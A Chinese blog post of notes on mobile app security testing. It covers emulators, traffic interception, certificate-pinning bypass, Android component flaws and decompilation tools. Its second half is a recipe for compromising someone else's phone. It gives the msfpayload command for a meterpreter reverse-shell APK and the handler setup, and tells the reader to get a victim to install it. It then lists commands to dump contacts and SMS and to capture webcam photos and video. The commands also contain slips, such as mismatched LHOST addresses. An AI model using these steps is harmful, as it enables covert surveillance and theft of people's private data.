web安全之移动端安全

基础

模拟器:夜神/蓝手指BlueStacks、MuMu模拟器、

抓包器:burpsuite、Fidder

adb连接   pc-cli调试模拟器    夜神-62001端口

APP安全测试流程

1 信息收集:域名、子域名、DNS地址、后台地址。
2 APP应用层渗透:
类似web渗透流程!无法漏扫——只能抓包分析。
抓包方法:物理机无线开启代理、模拟器无线开启代理、bp抓包!
注:无法抓包,SSL证书预绑定并连接时需校验怎么办?绕过证书检查——安装xposed框架+JustTrustMe组件。
3 四大组件渗透:四大组件  权限声明项,分别对应操作系统功能
activity  用户操作的可视化界面  生命周期running/paused/stoped/detroyed   漏洞 组件导出漏洞
service  后台运行  模式started/bound    漏洞 权限提升、拒绝服务等
broadcast receive    广播接收     注册方式  静态注册、动态注册      
漏洞  组件导出漏洞
content providers    数据共享接口    主要方法(略)     漏洞  读写权限漏洞、SQL注入漏洞、目录遍历漏洞   URI  content://com.apkname:path/

工具篇drozer   

Android安全测试框架

pc安装服务端、模拟器里安装客户端

CLI:run app.conpententname.info  -a apkname

apk反编译  

原理:源码——加壳(xml文件)——编译成apk。

xml文件:apk改之理、apktool

dex文件:Dex2Jar软件、JD-GUI软件

ddms

APP开发

Hbuilder编译器

入侵安卓手机

首先入侵手机的原理是 你需要生成一个安卓手机的木马程序xxx.apk 安卓安装程序安装到你的手机上去。
然后运行这个安卓程序。然后这个木马就会反弹连接你的电脑,然后你就可以控制他的手机了,原理就这些
首先条件就是
1 网络能够联通,手机木马反连接你 他的手机首先能上网,你的ip得是外网ip,如果在内网也可以。
2 你需要想办法让他安装你生成的木马并运行。就ok了 

步骤1
生成木马程序  192.168.1.105 我的电脑ip  7777是反连接我的端口号,不能用已经使用的端口号。
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=7777 R > /root/cracer.apk  
生成木马的位置名字cracer.apk
use exploit/mutli/handler
set payload android/meterpreter/reverse_tcp
set LHOST 172.16.1.105
exploit



打开msf用来侦听反连接的木马
ok 生成完毕了 吧生成好的木马拿出来发给手机
我安装上安卓木马
安装完打开
我们看侦听的结果
ok 我打开木马
反链我了


dump_contacts????--这个是导出电话
dump_sms --这个是导出信息
Webcam_list可以看到有几个摄像头
-i 1  是选择后摄像头 
webcam_snap   是拍照    ,看到我电脑了
webcam_stream  开启摄像头   

ok 就演示这些给大家
其他功能你们去实验下吧

 

posted @ 2022-10-22 18:22  dustfree  阅读(63)  评论(0编辑  收藏  举报